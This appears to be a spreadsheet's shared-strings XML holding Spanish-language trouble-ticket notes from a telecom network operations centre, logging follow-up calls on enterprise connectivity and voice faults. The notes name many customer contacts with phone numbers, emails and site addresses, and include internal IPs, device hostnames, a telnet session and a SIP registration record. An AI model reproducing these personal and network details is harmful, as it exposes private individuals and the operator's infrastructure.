  <si>
    <t>SE LLAMA A CENTRAL NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001977215</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001955919</t>
  </si>
  <si>
    <t>F4587907</t>
  </si>
  <si>
    <t>**SE LLAMA A  ENCARGADO DE TIENDA AL 42960341 NO RESPONDE ENVIA A BUZON ||
SE INTENTARA LUEGO **
-ID 1001012185
**</t>
  </si>
  <si>
    <t>F4587914</t>
  </si>
  <si>
    <t>24/7
INTERNET_4AV ENTRE 11 Y 12 CALLE PUERTO BARRIOS  15.7297070 -88.6014400
DIANA CASTELLANOS - 59512250
DIANA.CASTELLANOS@GOLANPROTEGE.COM &gt; INDICA SE COMPARTA DATOS DE TECNICO DPI Y # PLACAS DEL VEHICULO SI EN DADO CASO INGRESAN.-&gt;&gt;&gt;</t>
  </si>
  <si>
    <t>**SE LLAMA NUEVAMENTE AL CLIENTE DIANA CASTELLANOS NO RESPONDE || SE INTENTARA LUEGO **
ID 3001961283 - 3001962417
**</t>
  </si>
  <si>
    <t>F4587929</t>
  </si>
  <si>
    <t>SE ENVIO CORREO  A CLIENTE
NVIADO: JUEVES, 2 DE JUNIO DE 2022 16:07PARA: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_WALMART_SV_DDJ_SAN_MIGUEL_CENT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7929
ID: IPG003007SV
IDENTIFICADOR DEL CLIENTE:  CC_WALMART_SV_DDJ_SAN_MIGUEL_CENTRO
UBICADO EN:  SAN MIGUEL   BO. SAN FRANCISCO      AVENIDA MONSE¥OR ROMERO207
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4587951</t>
  </si>
  <si>
    <t>SE TIENE RESPUESTA DEL CLIENTE VIA SKYPE, DONDE INDICA QUE NO SE CUENTA CON ENERGIA EN EL SITIO.</t>
  </si>
  <si>
    <t>F4587952</t>
  </si>
  <si>
    <t>CLIENTE HUGO CONFIRMA QUE SU SOLICITUD FUE REALIZADA CON EXITO Y YA  ESTA MOSTRANDO LOS DID EN SUS LLAMADAS.
1001506775
COLA:
NOMBRE: A: 52650069
NÚMERO: 52650069
DURACIÓN: 0:00:37
ESTADO: CONECTADA
DETALLES: 52650069
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 6/06/2022 10:05:26</t>
  </si>
  <si>
    <t>F4587964</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE CELESTE HERNANDEZ QUIEN VA APOYAR CON LA REVISION DE EQUIPOS.
3001948409
COLA:
NOMBRE: A: 40033351
NÚMERO: 011 50240033351
DURACIÓN: 0:01:18
ESTADO: CONECTADA
DETALLES: +50240033351
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 2/06/2022 16:10:11</t>
  </si>
  <si>
    <t>SE HABLO  CON EL CLIENTE CELESTE HERNANDEZ QUIEN INDICA QUE EL EQUIPO NO ESTA ALARMADO, SE APLICO UN RESET PERO EL SERVICIO NO LEVANTA.
INDICA QUE HOY LABORAN   HASTA LAS 17:00HRS. Y QUE SE LE ENVIE PERSONAL EL DIA DE MAÑANA EN EL HORARIO DE 9:30 A 15:00HRS.
NO SE REQUIEREN PERSMISOS DE ACCESO.
SE APERTURA WO PARA LA ASIGNACION DE PERSONAL.
3001948409
COLA:
NOMBRE: A: 40033351
NÚMERO: 011 50240033351
DURACIÓN: 0:15:55
ESTADO: CONECTADA
DETALLES: +50240033351
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 2/06/2022 16:24:48</t>
  </si>
  <si>
    <t>F4587976</t>
  </si>
  <si>
    <t>SR. LUIS GALINDO 40061620 CONFIRMA QUE YA APLICARON REINICIO AL CPE, VALIDA CONEXIONES, SOLICITA VISITA COORDINAR VISITA TECNICA.</t>
  </si>
  <si>
    <t>F4587987</t>
  </si>
  <si>
    <t>TICKET PENDIENTE POR DESLIST, HAY SEGUIMIENTO VÍA CORREO CON CLIENTE/COMERCIAL:
ASUNTO: RE: RANGO IP ENLACE</t>
  </si>
  <si>
    <t>F4587994</t>
  </si>
  <si>
    <t>SE LE INDICA AL CLIENTE LEONARDO BOJ 55167582  QUE A NIVEL DE CLARO EL SERVICIO SE ENCUENTRA FUNCIONANDO CORRECTAMENTE, SIN EMBARGO, CLIENTE SOLICITA QUE SE QUEDE EN OBSERVACIÓN Y SE VALIDE AL MEDIO DÍA. INDICA TAMBIÉN QUE VA A SOLICITAR EL TRASLADO FÍSICO DE SUS EQUIPOS A OTRA UBICACIÓN INDICA QUE ÉL LE DARÁ SEGUIMIENTO CON SU EJECUTIVA LAURA LOPEZ.
SE DA CODIGO DE CIERRE EN ETA</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LEONADOR BOJ 55167582 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001092133 - 1001092342</t>
  </si>
  <si>
    <t>F4587995</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE EVELYN SALAZAR-76769577 SE TIENE EN LINEA ##
1001751364
COLA:
NOMBRE: 0050376769577
NÚMERO: 0050376769577
DURACIÓN: 0:05:20
ESTADO: CONECTADA
DETALLES: 0050376769577
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 7/06/2022 11:18:56</t>
  </si>
  <si>
    <t>CLIENTE PRESETA INESTABILIDAD EN LAS LLAMADAS## A NIVEL DE PING SERVICIO ESTA ACTIVO. TAMBIEN SE REGISTRA EL SERVICIO ## SE LLAMARA A LAS 13 HORAS A CX Y A CLIENTE PARA REALIZAR PRUEBAS
RESULTADO: CONTESTADA
NOMBRE: CONMUTACIÓN CX -
NÚMERO: 24206352
INICIO: HOY, 11:47
FIN: HOY, 11:55
DURACIÓN: 8:23
ID DE LLAMADA: 1001763380
RESULTADO: LLAMADA HECHA
NOMBRE: 0050376769577
NÚMERO: 0050376769577
INICIO: HOY, 11:53
FIN: HOY, 11:53
DURACIÓN: 0:42
ID DE LLAMADA: 1001765678
RESULTADO: LLAMADA HECHA
NOMBRE: 0050376769577
NÚMERO: 0050376769577
INICIO: HOY, 11:52
FIN: HOY, 11:53
DURACIÓN: 0:40
ID DE LLAMADA: 1001765459</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE- INDICA QUE EN ESTE MOMENTO SI TIENE LLAMADAS ENTRANTES Y SALIENTES## SE SEGUIRAN REALIZANDO PRUEBAS
1001790992
COLA:
NOMBRE: A: 0050376769577
NÚMERO: 0050376769577
DURACIÓN: 0:03:00
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050376769577
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 7/06/2022 13:14:23</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE EVELYN SALAZAR-76769577 PARA VALIDAR EL SERVICIO SIN EMBARGO NO SE TIENE RESPUESTA, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN SALAZAR-76769577  SE LE EXPLICA AC LIENTE QUE DEBE REALIZAR PRUEBAS- ##CLIENTE REALIZARA, SE LLAMARA POR LA TARDE PARA VERIFICAR QUE YA NO HAYA TENIDO PROBLEMAS- ##CIC
1001038822
COLA:
NOMBRE: A: 0050376769577
NÚMERO: 0050376769577
DURACIÓN: 0:01:55
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050376769577
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 3/06/2022 09:41:52
1001039316
COLA:
NOMBRE: A: 0050376769577
NÚMERO: 0050376769577
DURACIÓN: 0:02:29
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050376769577
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 3/06/2022 09:44:55</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 2 VECES ## NO CONTESTA- ##ENVIA DIRECTO A BUZON  ## SE DARA SEGUIMIENTO EL DIA DE MAÑNAA EN HORARIO HABIL DE CLIENTE + A NVIEL DE CALRO NO SE OBSERVAN INCOVENIENTES- ##VIVO
NOTA: CX QUITO A CLIENTE DE CENTRAL Y LUEGO LO VOLVIO A CONFIGURAR AYER JUEVES, HOY VIERNES CLEINTE INDICA QUE PSERENTO PROBLEMAS PERO NO SE OSBERVAN LOGS EN EQUIPO ETX + SE OSBERVA EL SERVICIO ACTIVO- ## SE VALIDARA MAÑANA
&lt;LACUSVZWN1D1EID1&gt;TELNET 10.146.37.158
TRYING 10.146.37.158 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.146.37.158 ...
USER&gt;SU
PASSWORD&gt;****
ID1028428_S.L.I_CON*# SHOW CONFIGURE REPORTING LOG
LAST ACKNOWLEDGE ON : --           --
1     SU LOGIN FROM 10.146.37.1 TELNET
2022-06-03   SYSTEM                 SUCCESSFUL_LOGIN                 EVENT
13:40:47.03  SYSTEM
2     SU LOGOUT FROM 10.146.37.1 TELNET DUE TO USER LOGO
2022-06-01   SYSTEM                 LOGOUT                           EVENT
15:17:54.07  SYSTEM
3     SU LOGIN FROM 10.146.37.1 TELNET
2022-06-01   SYSTEM                 SUCCESSFUL_LOGIN                 EVENT
13:58:00.05  SYSTEM
4     LOSS OF SIGNAL (LOS)
2022-05-30   ETHERNET               LOS                              CLEARED
13:30:39.08  ETHERNET 4                                              SUPPRESSION
5     LOSS OF SIGNAL (LOS)
ID1028428_S.L.I_CON*&gt;CONFIG&gt;SYSTEM# SHOW SYSTEM-DATE
2022-06-03   13:43:58  UTC  +00:00
ID1028428_S.L.I_CON*&gt;CONFIG&gt;SYSTEM#</t>
  </si>
  <si>
    <t>###FAVO RPROGRAMAR PARA LAS 8:30AM ##
F4587995
GDN 22396900
COMPAÑIA:
S.L.I. ABOGADOS CONSULTORES S.A. DE C.V.
SAN SALVADOR COL. MANUEL JOSE ARCE AVENIDA INFANTERIA 13 POL "C"
PERSONA EN SITIO EVELYN SALAZAR-76769577
NUMERO DE PERSONA EN SITIO:EVELYN SALAZAR-76769577
ACCESO EMPRESARIAL
SERVICIO FIBRA/ETX
NOTA: SI SE NECESITAN PERMISOS-
HORARIO:8 AM A 18 HORAS
DIAGNOSTICO- CLIENTE INDICA QUE SERVICIO HA PRESENTADO INESTABILIDAD, COMENTA QUE TIENE PROBLEMAS CON LAS LLAMADAS + QUE TODO EL TIEMPO SE LE ESTA DANDO QUENO POSEE LLAMADAS ENTRANTES Y SLAIENTES ##FAVOR SU APOYO, CLIENTE EXIGE CERTIFICACION ##
##SE HA ENVIADO CORREO CON DATOS DE ESTE SERVICIO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN SALAZAR-76769577 MENCIONA QUETODO ESTA FUNCIONANDO BIEN PERO SOLICITA LLAMADA PARA LAS 11 VALIDAR EL FUNCIONAMIENTO
-ID 1001481292</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN SALAZAR-76769577 PERO NO RESPONDE ENVIA A BUZON, SE INTENTARA LUEGO
-ID 1001473286 - 1001473545</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EVELYN SALAZAR-76769577 MENCIONA QUE DESDE LA MAÑANA  NO TIENE LLAMADAS SALIENTES NI LLAMADAS ENTRANTES, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001528925 - 1001529039</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN SALAZAR-76769577 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001172099</t>
  </si>
  <si>
    <t>EJECUTIVA 7860-2608 ASTRID ---ESCALA CASO,  SE LE COMENTA EL HISTORIAL DEL CLIENTE Y PRINCIPALMENTE  LO QUE SE DETECTO ENE L TICKET ANTERIOR, POR LO QUE SE PROCEDERA A COORDINAR PERSONAL TANTO DE PBX COMO DE PLEX PARA CERTIFICACION TOTAL DEL SERVICIO  ### SE LE LLAMARA A LAS 16:30 HORAS PAARA CONFIRMAR FECHA Y HORA DE VISITA##</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN SALAZAR-76769577 MENCIONA QUE VOLVIERON A PRESENTAR PROBLEMA EN EL HORARIO:
11:30 - 11:49
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001135622</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN SALAZAR-76769577 ENVIA A BUZON 3#VIVO ##SE MARCARON 3 VECES ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 22396900 LLAMAA COMPLETA ##VIVO</t>
  </si>
  <si>
    <t>##SERVICIO A NIVEL DE CLARO SE OBSERVA BIEN ## LLAMAAS AL GN 22396900 COMPLETAN### CLIENTE DEBERA REALIZAR MÁS PRUEBAS##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A EJECUTIVA ASTRID  78602608    INDICA QUE CLIENTE PROGRAMO VISITA CON PROVEEDOR DE PBX A LAS 2:00PM ##PARAA CERTIFICACION###VIVO</t>
  </si>
  <si>
    <t>##CLIENTE ESTA REINICIANDO SU PBX## SE ESPERA A QUE CARGUE PBX###NOS MANTIENE EN LINEA##</t>
  </si>
  <si>
    <t>SE BOTA SERVICIO EN CENTRAL + PBX YA SE REGISTRA ##
1001751364
COLA:
NOMBRE: 0050376769577
NÚMERO: 0050376769577
DURACIÓN: 0:10:42
ESTADO: CONECTADA
DETALLES: 0050376769577
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 7/06/2022 11:24:17
LLAMADAS AL GDN COMPLETAN
1001754579
COLA:
NOMBRE: A: 0050322396900
NÚMERO: 0050322396900
DURACIÓN: 0:00:08
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050322396900
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 7/06/2022 11:24:22</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EVELYN SALAZAR-76769577 INDICA QUE SIGUE EL MISMO INCONVENIENTE QUE AUN LE PERMITE SACAR NI RECIBIR LLAMADAS || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001692201
**</t>
  </si>
  <si>
    <t>SE HABLA CON EJECUTIVO- EJECUTIVO ASTRID78602608  INDICA QUE YA ESTA ENTERADA + QUE LE HA PEDIDO A CLIENTE UNA CARTA PARA PODER SEGUIR EL PROCESO ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 22396900 ##LLAMADA COMPLETA ##VIVO</t>
  </si>
  <si>
    <t>F4588008</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MILTON GOMEZ AL 76038296  INDICA QUE SI CUENTAN CON ENERGIA SE SOLICITAN DATOS DE VISITA || SE NOTIFICA A GESTOR **
HORARIO DE ATENCION: 6:00 AM A 19:00 PM
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: CARRETERA PANAMERICANA EX FABRICA DE CALCETINES INDEO ENTRADA A LA COLONIA LA PRADERA SAN MIGUEL
ATENDERA EN SITIO: MILTON GOMEZ
ID 1001012852
**</t>
  </si>
  <si>
    <t>F4588009</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO FLORES  AL 33420437 INDICA QUE QUE QUEDARON DE VERIFICAR EL ENRUTAMIENTO PARA SABER QUE SEGMENTO PODIA UTILIZAR SE NOTIFICA A GESTOR INDICA QUE NO PUEDE INGRESAR AL ROUTER Y SE SOLICITA A CLIENTE QUE LO REINICIE CLIENTE INDICA QUE REINICIARA EL EQUIPO QUE SE LE DE 10MIN PARA REINICIAR || SE NOTIFICA A GESTOR **
-ID 1001027117 - 1001030428
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO FLORES  AL 33420437 NO RESPONDE, ENVIA A BUZON ||
SE INTENTARA LUEGO **
-ID 1001015002
**</t>
  </si>
  <si>
    <t>F4588011</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE MIRLA ROLDAN, QUIEN AUN NO UBICA EL EQUIPO.
EQUIPOS
3001961356
COLA:
NOMBRE: A: 30094595
NÚMERO: 011 50230094595
DURACIÓN: 0:00:53
ESTADO: CONECTADA
DETALLES: +50230094595
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 2/06/2022 16:54:01</t>
  </si>
  <si>
    <t>F4588037</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIME SE LE RETROALIMENTA SOBRE EL SEGUIMIENTO, SE LE INFORMA QUE SE ESTARA LLAMANDO EN UN LAPSO DE 30 MINUTOS PARA BRINDARLE AVANCES
3001990933
COLA:
NOMBRE: A: 0050588729408
NÚMERO: 0050588729408
DURACIÓN: 0:01:13
ESTADO: CONECTADA
DETALLES: 0050588729408
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 2/06/2022 19:53:41</t>
  </si>
  <si>
    <t>F4588040</t>
  </si>
  <si>
    <t>**SE LLAMA A JOHN CORTEZ  AL 505 8388 2586 INDICA QUE AUN ESTA DOW EL SERVICIO || SE NOTIFICA
 A GESTOR **
ID 1001004832
**</t>
  </si>
  <si>
    <t>**SE LLAMA A JOHN CORTEZ  AL 505 8388 2586 INDICA QUE AUN ESTA DOW EL SERVICIO || SE NOTIFICA
 A GESTOR **
ID 1001003272
**</t>
  </si>
  <si>
    <t>F4588043</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. JOHN CORTEZ  +505 8388 2586 NO SE LOGRO COMUNICACION, ID: 3001973266.</t>
  </si>
  <si>
    <t>F4588045</t>
  </si>
  <si>
    <t>SE FINALIZARA LLAMDA CON CL F4587914 PARA SEGUIMIENTO DE ESTE CASO.</t>
  </si>
  <si>
    <t>|| SE LE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS AL SITIO || PENDIENTE CONFIRMEN, TECNICO ENTERADO DE PENDIENTE DE ACCESOS
ERITO FERNANDO TECU XITUMUL
ASUNTO: VISITA TÉCNICA MCDONALDS ID: 727100110T || KM. 56 RUTA CA-1 C.C. PLAZA BARBERENA
BUENA NOCHE ESTIMADOS.
EN SEGUIMIENTO EL SERVICIO REPORTADO ID: 727100110T || INDUSTRIA DE HAMBURGUESAS MCDONALDS || KM. 56 RUTA CA-1 C.C. PLAZA BARBERENA, BARBERENA SANTA ROSA.
LE COMENTO QUE SE ESTÁ COORDINANDO UNA VISITA TÉCNICA PARA VERIFICAR EL ESTADO DE LAS CONEXIONES Y EL EQUIPO EN LA SUCURSAL, SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR LOS PERMISOS DE INGRESO AL RESTAURANTE Y DE SER NECESARIO CON EL CENTRO COMERCIAL PARA NUESTRO PERSONAL TÉCNICO.</t>
  </si>
  <si>
    <t>F4588067</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA BIANCA GONZALES-47035741 ## NOS DEJA EN ESPERA ##VIVO</t>
  </si>
  <si>
    <t>##CLIENTE APLICA RESET A CTC Y SERVICIO RESTABLECE ##REALIZA PRUEBAS##VALIDA SERVICIO ##
INFO: THE DEVICE IS NOT ENABLED WITH SECURE BOOT, PLEASE ENABLE IT.
&lt;GNCYGTVGN1T1E06B02EIM4&gt;PING -C 1500 -S 1500 -M 30 -B -VPN-INSTANCE IP_PBX_ACCESO  10.174.40.210
  PING 10.174.40.210: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.174.40.210 PING STATISTICS ---
    52 PACKET(S) TRANSMITTED
    52 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/13 MS
&lt;GNCYGTVGN1T1E06B02EIM4&gt;
EXP USRINF:ENTITYPE=PCSCF,IMPU="TEL:+50222152300";
GNCYGTAJ_CENTRO_CSCF
+++    CSCF/*MEID:5 MENAME:GNCYGTAJ_CENTRO_CSCF*/        2022-06-03 08:47:20-06:00
O&amp;M    #390288
%%/*1879545496 MEID=005*/EXP USRINF: ENTITYPE=PCSCF,IMPU="TEL:+50222152300";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
                      IMPI  =  +50222152300@IMSHWI.CLARO.COM.GT
                      IMPU  =  TEL:+50222152300
                SCU NUMBER  =  112
            REGISTER STATE  =  REGISTERED
             REGISTER TIME  =  3600
             RESIDUAL TIME  =  3383
      SERVICE-ROUTE HEADER  =  &lt;SIP:ORIG@CESCSCF1.IMSHWI.CLARO.COM.GT;LR;DPT=7C34_E7D33246;CA=2FBF&gt;
           CONTACT ADDRESS  =  &lt;SIP:+50222152300@10.16.113.250:53697;TRANSPORT=UDP;ANN=FIXED-ACCESS_1&gt;
         ACCESS NETWORK ID  =  1
USER EQUIPMENT ACCESS TYPE  =  NOT_IMS_UE
         USER SUBSCRIBE ID  =  NULL
           USER SESSION ID  =  9920
                USER AGENT  =  GRANDSTREAM UCM6204V1.4A 1.0.16
       ORIGINAL IP ADDRESS  =  10.174.40.210
               IFC UNSAVED  =  NO
(NUMBER OF RESULTS = 1)
---    END</t>
  </si>
  <si>
    <t>######CILICNET ENO UBICA EQUIPO, SE DA SEGUIMIENTO MAÑANA  A LAS 8:30 AM ## CLIENTE INDICA QUE TIENE  3 PBX Y SERA NECSARIO QUE TECNICO DE ELLOS NOS APOYEN A VERIFICAR EL EQUIPO DE FIBRA ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BIANCA GONZALES-47035741  SE TIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>F4588089</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 58245252/55352652 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE; ADICIONAL SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE A VER COMPORTAMIENTO DEL SERVICIO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIO CORTEZ AL 55352652 NO RESPONDE ENVIA A BUZON **
ID 1001034099
**</t>
  </si>
  <si>
    <t>**SE LLAMA A FRANCISCO YOOL 58261059 NO RESPONDE ENVIA A BUZON SE LLAMA A CLIENTE GABRIELA TORRES AL  56322556  INDICA QUE NO SE ENCUENTRA EN SITIO QUE SE LLAME A DANILO BARRERA AL 58245252**
ID 1001034815 - 1001035158
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  DANILO BARRERA AL 58245252 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001036354
**</t>
  </si>
  <si>
    <t>F4588097</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AGUSTIN ERNESTO OPICO AL 70550036 INDICA QUE YA QUEDARON QUE A LAS 14 HRS LLEGARAN LOS TECNICOS SOLO ESO INDICA Y CORTA LLAMADA || SE NOTIFICA A GESTOR **
ID 1001040645
**</t>
  </si>
  <si>
    <t>F4588127</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR OSWALDO CONFIRMA QUE TICKET FUE CERRADO POR SU COMPAÑERO ADOLFO ROMANO Y QUE PODEMOS PROCEDER CON EL CIERRE **
ID 1001004234
**</t>
  </si>
  <si>
    <t>F4588128</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL ANGEL LOPEZ 79539611 NO RESPONDE ENVIA A BUZON ||
SE INTENTARA LUEGO **
ID 1001004464
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL ANGEL LOPEZ 79539611 MENCIONA QUE NO LLEGA AL ANCHO DE BANDA CONTRATADO
ADICIONAL SE VALIDA QUE ES NECESARIO RECUPERAR LA GESTION DE LOS EQUIPOS
-ID 1001052717
NOMBRE DEL CLIENTE: CPU INTERNET CAFE
UBICACIÓN:4 C. 9-74 Z.1 TACTIC ALTA VERAPAZ
CONTACTO EN SITIO: MIGUEL ANGEL LOPEZ 79539611
HORARIO DE ATENCION: 9:00 - 18:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL ANGEL LOPEZ 79539611 CONTESTA UNA SEÑORITA E INDICA QUE CLIENTE NO SE ENCUENTRA QUE SE LE LLAME A LAS 10:00 AM **
ID 1001011167
**</t>
  </si>
  <si>
    <t>F4588130</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA LA SEÑORITA GUADALUPE SANCHEZ CONFIRMA QUE SE PUEDE CERRAR EL TICKET YA QUE DE SU LADO ESTA CERRADO **
-ID 1001005560
**</t>
  </si>
  <si>
    <t>F4588140</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL NOC CORPORATIVO  AL 23742017 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001006088
**</t>
  </si>
  <si>
    <t>F4588231</t>
  </si>
  <si>
    <t>SE LLAMA A WALTER REYES 45787911 PARA VALIDAR OTRO CONTACTO PERO NO SE LOGRA COMUNICACION
ID
1001864852
COLA:
NOMBRE: A: 45787911
NÚMERO: 55280199
DURACIÓN: 0:00:45
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 7/06/2022 17:16:02</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE  A NUMERO 46728456 BRINDADO POR WALTER REYES EN EL CORREO, TIMBRA PERO NO SE TIENE RESPUESTA
ID
2001681847
COLA:
NOMBRE: A: 46728456
NÚMERO: 46728456
DURACIÓN: 0:00:56
ESTADO: MARCANDO
DETALLES: 46728456
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 11/06/2022 18:28:10</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE  A NUMERO 46728456, TIMBRA PERO NO SE TIENE RESPUESTA
ID
2001551421
COLA:
NOMBRE: A: 46728456
NÚMERO: 55280199
DURACIÓN: 0:00:46
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 10/06/2022 19:53:07</t>
  </si>
  <si>
    <t>SE LLAMA A NUMERO 78446903 BRINDADO EN CORREO POR WALTER REYES, PERO NO SE LOGRA COMUNICACION, SE INTENTARA EN BREVE CON AMBOS NUMEROS
ID
2001529276
COLA:
NOMBRE: A: 78446903
NÚMERO: 78446903
DURACIÓN: 0:00:55
ESTADO: CONECTADA
DETALLES: 78446903
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 10/06/2022 17:02:04</t>
  </si>
  <si>
    <t>SE LLAMA A NUMERO 46728456, SIN EMBARGO ENVIA A BUZON DIRECTAMENTE
ID
2001528918
COLA:
NOMBRE: A: 46728456
NÚMERO: 55280199
DURACIÓN: 0:01:00
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 10/06/2022 17:00:01</t>
  </si>
  <si>
    <t>WALTER REYES BRINDA CONTACTOS DE TIENDA
WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
BUENA TARDE, SEGÚN NUESTRO MONITOR LOS DOS ENLACE SE MUESTRAN EN LÍNEA.
FAVOR SU APOYO CON LO QUE NOS COMPARTEN.
FAVOR CONTACTAR A :
GERENTE CRISTOBAL MONZÓN
PUNTO DE VENTA
46728456
78446903</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO CON CONTACTOS POR CORREO YA QUE NO SE LOGRA CONTACTAR VIA TELEFONICA
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE REDUNDANTE ALARMADO PARA EL PUNTO DE VENTA CC_CAMPERO_GT_C692, SOLICITAMOS SU APOYO CON LO REQUERIDO EN CORREO QUE ANTECEDE.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A BYRON RUIZ PERO NO SE TIENE RESPUESTA
2001452438
COLA:
